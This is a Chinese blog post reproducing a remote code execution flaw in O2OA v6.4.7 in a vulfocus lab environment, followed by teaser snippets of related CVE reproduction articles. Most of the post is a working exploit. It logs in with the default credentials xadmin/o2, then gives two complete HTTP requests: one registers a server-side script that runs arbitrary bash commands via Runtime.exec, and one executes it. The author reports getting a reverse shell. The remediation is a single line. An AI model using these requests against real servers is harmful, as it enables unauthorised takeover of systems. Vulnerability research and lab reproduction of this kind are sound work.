代码编织梦想

1、产品简介

 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理、门户管理、信息管理、数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度。

2、漏洞概述

   O2OA是一个基于 J2EE 分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本,基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。通过/x_program_center/jaxrs/invoke 发现 020A v6.4.7 包含一个远程代码执行(RCE)漏洞。

3、影响范围

     020A v6.4.7

4、复现环境

       vulfocus在线靶场环境

 5、利用流程

  1、使用默认口令xadmin/o2登录后台,利用某大佬写的POC进行复现

     项目地址:O2OA-POC/POC.md at main · wendell1224/O2OA-POC · GitHub

 注意事项:大佬的POC里面应该是打错了,多打了一个 " / " ,所以导致添加的接口无法调用指令,删掉即可。

   bp抓包收集 Authorization字段信息

添加一个接口

POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: [your target host]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: [your authorization]
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475

{"name":"abc","id":"abc","alias":"","description":"","isNewInvoke":true,"text":"\n\nvar s = [3];\ns[0] = \"/bin/bash\";\ns[1] = \"-c\";\ns[2] = \"[command]\";\nvar p = java.lang.Runtime.getRuntime().exec(s);\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}

 2、调用接口中的命令反弹shell

POST /x_program_center/jaxrs/invoke/abc/execute?v=6.3 HTTP/1.1
Host: [your target host]
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: [your authorization]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://[your target host]
Referer: http://[your target host]/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie: 
Connection: close

 VPS成功反弹shell

 6、修复建议

    升级至安全版本。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/128680510

Apache Solr 远程命令执行漏洞(CVE-2017-12629)-爱代码爱编程

Apache Solr 远程命令执行漏洞(CVE-2017-12629) 漏洞描述: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其

PostgreSQL JDBC Driver RCE&任意文件写入漏洞【CVE-2022-21724】-爱代码爱编程

PostgreSQL JDBC Driver RCE&任意文件写入漏洞 RCE任意文件写 上班没有任务你们都干什么,反正我是不会摸鱼的,这辈子都不可能摸鱼的,复现这个漏洞的初衷是看了某公众号关于Vmware Workspace One Access的jdbc注入漏洞,文中值分析到jdbc url可控的部分,但是我不太清楚为什么jdbc可

gitlab 远程命令执行漏洞(cve-2021-22205)_weixin_42299610的博客-爱代码爱编程

概述 风险等级:高 缺陷描述: 由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令。此次受影响版本为11.9 <= Gitlab CE/EE < 13.8.8;13.9 <= Gitlab CE/EE < 13.9.6;13.10 <= G

atlassian confluence 远程代码执行漏洞(cve-2022-26134)复现_绘梨衣的sakura路的博客-爱代码爱编程_cve

Confluence介绍 Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。 漏洞概述 Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。 2022年6月2日,At

springboot远程代码执行漏洞复现(cve-2022-22965)_初岄的博客-爱代码爱编程

Springboot远程代码执行漏洞复现(CVE-2022-22965) 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 文章目录 Springboot远程代码执行漏洞复现(CVE-2022-22965) 漏洞描述 漏洞影响 漏洞复现 通过上传jsp文件进行RCE

samba 远程命令执行漏洞(cve-2017-7494)_半点闲的博客-爱代码爱编程

Samba 远程命令执行漏洞(CVE-2017-7494) 原理测试过程 作者:高玉涵 时间:2022.7.29 17:00 博客:blog.csdn.net/cg_i 环境:Samba版本:4.6.

apache commons configuration远程代码执行漏洞(cve-2022-33980)分析&复现_byzf的博客-爱代码爱编程

文章目录 一、什么是Apache Commons Configuration二、Apache Commons Configuration远程代码执行漏洞漏洞状态漏洞描述漏洞等级影响范围修复建议 三、漏洞分析四

spring 远程命令执行漏洞分析(cve-2022-22965)_浔阳江头夜送客丶的博客-爱代码爱编程

Spring 远程命令执行漏洞分析(CVE-2022-22965) 0x00 前言0x01 环境搭建war包部署远程调试 0x02 漏洞利用0x03 漏洞分析getPropertyAccessorForProp

cve-2022-0824 webmin 远程代码执行漏洞复现_evan kang的博客-爱代码爱编程

目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: Vulfocus环境搭建: 漏洞环境搭建: 后台执行: 导入环境: 启动&访问: ​编辑Kali监听:​ 0x06 漏洞复现: POC: 下载地址: 执行POC: 0x07 流量分析: 特征一(强特征):

漏洞复现-爱代码爱编程

文章目录 一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,

cve-爱代码爱编程

目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: Docker环境: 漏洞环境: 0x06 漏洞复现: 1、构造payload: 2、burp修改请求体: 3、请求: 4、查看文件: 0x07 流量分析: 1、请求流量: 2、RCE流量: 0x08 修复建议:

windows tcp/ip 远程代码执行漏洞 (cve-爱代码爱编程

目录 漏洞概述 环境搭建 漏洞复现 漏洞概述 微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。 IPSec是一种可以对指定类型ip流量筛选过滤,并加密验证的一种协议。通常在VPN或者增强其他协议密码安全性的部分条件下使用。 环境搭建 在windows中 ,我们需要搭建一个域条件下,两台对对方所有流量都加密验证的环境。因

o2oa cve-爱代码爱编程

O2OA CVE-2022-22916 默认口令xadmin/o2登录后台 进入服务管理 新建接口 var s = [3]; s[0] = "/bin/bash"; s[1] = "-c"; s[2] = "ba